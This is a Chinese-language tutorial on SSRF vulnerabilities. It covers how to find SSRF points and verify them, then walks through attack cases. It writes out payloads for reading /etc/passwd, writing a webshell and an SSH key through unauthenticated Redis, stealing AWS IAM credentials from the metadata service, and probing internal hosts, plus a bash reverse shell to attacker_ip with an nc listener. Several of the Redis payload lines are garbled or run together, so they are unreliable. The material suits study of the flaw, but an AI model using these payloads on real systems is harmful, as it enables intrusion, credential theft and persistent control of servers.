SSRF漏洞的概念

SSRF（Server-Side Request Forgery，服务端请求伪造）漏洞是指攻击者可以通过构造恶意请求，诱使服务端发起请求到攻击者指定的地址。由于服务端通常拥有更高的权限，比如访问内网资源或敏感数据，这种漏洞可能被用来：

- 获取服务器内部敏感信息。

- 探测内网结构。

- 执行其他攻击，如利用 Redis、ElasticSearch 等内网服务漏洞。

SSRF的基本原理

服务端接受并处理用户输入的 URL 请求。未对输入进行严格验证，直接发送请求。攻击者通过精心构造的 URL，强制服务端请求内网资源或恶意地址。

SSRF的危害

- 信息泄露：通过访问内网服务获取敏感信息。

- 内部网络探测：探测服务器所在内网的拓扑结构。

- 访问非授权服务：如访问管理面板、数据库等。

- 进一步攻击：通过 SSRF 访问漏洞系统实施更深层次的攻击。

寻找潜在的 SSRF 攻击点

SSRF 通常出现在以下功能模块中：

- 文件下载功能：如图片下载、文件预览接口，URL 参数指定文件路径。

- 示例 URL: `http://example.com/download?url=http://example.org/file.pdf`

- 图片抓取功能：通过 URL 加载远程图片。

- 示例 URL: `http://example.com/getImage?url=http://example.org/image.png`

- Webhooks 或回调 URL：如系统支持第三方服务的回调机制。

- 示例 URL: `http://example.com/callback?url=http://example.org/webhook`

- 服务端请求的 API 功能：如通过 URL 提供 API 的代理功能。

- 示例 URL: `http://example.com/api?endpoint=http://example.org/api/resource`

判断是否由服务端发起请求

方法：尝试向可控的服务器（如 Burp Collaborator、Ngrok、RequestBin）发送一个请求，观察是否收到访问日志。

- 示例测试 URL: `http://example.com/getImage?url=http://your-controlled-server.com`

工具：

- RequestBin: 用于生成临时可控 URL，监控服务端是否发送请求。

- Burp Collaborator: 内置的 DNS 与 HTTP 请求监控工具。

判断标准：如果目标系统发起请求并返回到你控制的服务器，则可能存在 SSRF。

漏洞验证阶段

1. 基本 SSRF 测试

对目标 URL 逐步构造以下请求：

- 请求外部资源：

- 测试 URL: `http://example.com/getImage?url=http://example.org`

- 请求本地资源：

- 测试 URL: `http://example.com/getImage?url=http://127.0.0.1:80`

2. 协议测试

测试目标系统是否支持非 HTTP 协议：

- file:// 协议：

- 测试 URL: `http://example.com/getImage?url=file:///etc/passwd`

- gopher:// 协议（可用于内网攻击或注入命令）：

- 构造简单的 gopher 请求：`gopher://127.0.0.1:6379/0PING`

3. 内网资源探测

通过 SSRF 验证能否访问内网资源：

- 构造内网 IP 请求（如常见内网网段）：

- 示例测试：`http://example.com/getImage?url=http://192.168.1.1`

4. 利用元数据服务（云环境）

在云环境下（如 AWS、Google Cloud、Azure 等），测试是否可以通过 SSRF 访问元数据服务：

- AWS 元数据服务：

- 常见测试 URL: `http://example.com/getImage?url=http://169.254.169.254/latest/meta-data/`

- Google Cloud 元数据服务：

- 常见测试 URL: `http://example.com/getImage?url=http://169.254.169.254/computeMetadata/v1/`

 5. 扩展攻击验证

尝试组合 SSRF 和其他漏洞验证更多危害：

- Redis 未授权访问：

- 利用 SSRF 构造 Redis 访问：

- 测试 URL: `http://example.com/getImage?url=gopher://127.0.0.1:6379/0SET+test+malicious_payload`

案例实战

 案例1：利用 SSRF 访问 Redis 未授权漏洞，写入 Webshell

目标场景：

目标网站有图片下载功能，接受一个 url 参数，直接下载并返回图片，例如：

- 示例 URL: `http://example.com/getImage?url=http://example.org/image.png`。

目标内网存在 Redis 服务（假设 IP 是 192.168.1.10），且未设置访问密码。

攻击步骤：

构造 SSRF 请求访问 Redis：

http://example.com/getImage?url=http://192.168.1.10:6379/

-- 确认服务可被访问。

- 向 Redis 写入恶意数据（通过 Redis 的 SET 和 CONFIG 命令）：

http://example.com/getImage?url=http://192.168.1.10:6379/SET+payload+malicious_code`

- 利用 Redis 写入 Webshell 到目标服务器的 Web 根目录：

http://example.com/getImage?url=http://192.168.1.10:6379/CONFIG+SET+dir+/var/www/htmlhttp://example.com/getImage?url=http://192.168.1.10:6379/CONFIG+SET+dbfilename+shell.phphttp://example.com/getImage?url=http://192.168.1.10:6379/SET+shell+

- 访问目标服务器：

- 测试 URL: `http://example.com/shell.php?cmd=id`

成功获取目标服务器的 Shell。

案例2：利用 SSRF + AWS 元数据服务获取敏感信息

目标场景：

云环境中（如 AWS EC2），目标应用允许外部通过 URL 加载资源。

攻击者利用 SSRF 请求 AWS 元数据服务（http://169.254.169.254）获取敏感信息。

攻击步骤：

- 构造请求获取 AWS 临时凭证：

http://example.com/getImage?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/

- 根据返回的角色名称（如 EC2Role），进一步获取访问密钥：

http://example.com/getImage?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/EC2Role

- 利用泄露的 Access Key 和 Secret Key，直接访问目标 AWS 资源，如 S3 存储桶、RDS 数据库等。

案例3：利用 SSRF 探测内网，反弹 Shell

目标场景：

内网存在弱口令的管理面板或服务（如 Jenkins、Tomcat）。

攻击者利用 SSRF 探测内网服务，并进一步实现反弹 Shell。

攻击步骤：

- 探测内网服务：通过逐步构造 URL 探测内网，例如：

http://example.com/getImage?url=http://192.168.1.1:8080/

http://example.com/getImage?url=http://192.168.1.2:8000/

- 根据返回的 HTTP 状态码，确认内网中服务的开放端口。

-攻击弱口令服务：假设发现 Jenkins 管理面板（默认端口 8080），尝试默认弱口令 admin:admin 登录。

- 通过 Jenkins 的命令执行功能上传恶意代码，实现反弹 Shell。

- 反弹 Shell：构造恶意 payload：

```bash

bash -i >& /dev/tcp/attacker_ip/1234 0>&1

```

- 在攻击者机器上监听：

```bash

nc -lvnp 1234

```

案例4：利用 SSRF 写入 SSH 公钥，实现持久化控制

目标场景：

目标内网有 SSH 服务开放，并且攻击者可以利用 SSRF 将恶意公钥写入目标服务器的 .ssh/authorized_keys 文件。

攻击步骤：

- 确定目标服务器的 IP 地址，并验证可以通过 SSRF 访问。

- 利用 Redis 未授权访问，写入公钥：

http://example.com/getImage?url=http://192.168.1.10:6379/CONFIG+SET+dir+/root/.ssh/http://example.com/getImage?url=http://192.168.1.10:6379/CONFIG+SET+dbfilename+authorized_keyshttp://example.com/getImage?url=http://192.168.1.10:6379/SET+ssh_key+

 - 通过 SSH 登录目标服务器：

ssh -i private_key root@192.168.1.10

案例5：SSRF 绕过限制，访问内网数据库

目标场景：

目标服务器有内网数据库（如 MySQL、PostgreSQL）服务，攻击者利用 SSRF 构造查询访问。

攻击步骤：

确认内网数据库 IP 和端口：

http://example.com/getImage?url=http://192.168.1.10:3306/

利用数据库查询接口注入恶意命令：

http://example.com/getImage?url=http://192.168.1.10:3306/select+user,host+from+mysql.user

进一步利用数据库执行敏感查询，获取内网数据。